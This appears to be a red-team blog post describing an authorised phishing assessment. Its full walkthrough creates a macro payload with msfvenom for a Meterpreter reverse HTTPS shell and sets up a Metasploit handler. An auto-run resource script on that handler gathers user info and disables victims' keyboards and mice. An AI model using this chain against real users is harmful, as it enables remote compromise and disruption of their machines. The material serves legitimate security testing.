Throughout the past year I have been conducting routine phishing assessments for a client. For their final test of the year, our point of contact wanted something consequential for those who fell for this phish… Something ‘kinetic’ if you will. They requested a ‘Blue Screen of Death’ approach, to which I ultimately opted for a less potentially destructive method. I would send the target list of about 450 users a link to a spreadsheet with macros in it (classic). If the macros were enabled it would establish a meterpreter session back to my C2, and then I would disable their mouse and keyboard. However, when manually disabling their mouse and keyboard the worst case scenario becomes the potential amount of shells I would be receiving and how fast; a good problem to have. The solution to this is utilizing a custom resource script to run automatically when a session is established.
Setup
Before we setup a payload and listener we want to think about what commands to run when our session(s) are established. In my phishing assessment I was concerned with two things, knowing who launched the payload and actually disabling their mouse and keyboard. All of this can be done through meterpreter already with three commands.
- getuid
- sysinfo (for good measure)
- uictl
Now let’s create our resource script. Use your text editor of choice, and put each command you want to run on their own new line. These will execute in the order they are written in, so if execution order is important based on a situation remember that.
getuid
sysinfo
uictl disable keyboard
uictl disable mouse
Save the file and name give it the ‘.rc’ extension. In this example, I’ll name it resource.rc and save it in the /root directory.
Now let’s establish the listener on our C2 server. The multi handler in metasploit is perfect for this situation. Once the module is selected there are two important settings we want to set after our standard LHOST and LPORT. The first is to set exitonsession to false, we are expecting to receive several sessions and do not want the handler to close after the first one. Next we want to make sure the resource script executes automatically.
set AutoRunScript multi_console_command -r /root/resource.rc
Finally when we launch the handler we want to give it the -j flag so it runs as a background job. Now once a meterpreter session is established the commands we put into the resource file will execute automatically.
Execution
Now for the payload itself. Ordinarily for most phishing payloads I default to Empire, but since we are looking to connect with meterpreter we’ll utilize msfvenom for our payload generation.
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=443 -e cmd/powershell_base64 -f vba-psh
The command above will output your macro that will be base64 encoded. Take it and throw it into a document of your choice. Once we send the phish all we have to do is wait while users do what they do best, click on links and download documents. Once the payload is delivered and a connection is established, our script should execute automatically.
And just like that our shells are coming through and executing the commands from the resource script without our interaction at all. For the assessment I used this on it was great to gather all of the user info in order to come back later and correlate the rest of the phishing data, also I didn’t have to babysit shells for a week while I could be doing other things.
Conclusion
Automation with meterpreter does not stop here with the standard commands. Scripts can be set up to run modules for privilege escalation, post exploitation, and establishing persistence. Write up your resource scripts ahead of time for what best suits the goals of the assessment. This will free up time for you to focus on the trophies and recommendations for the client.
Happy hunting!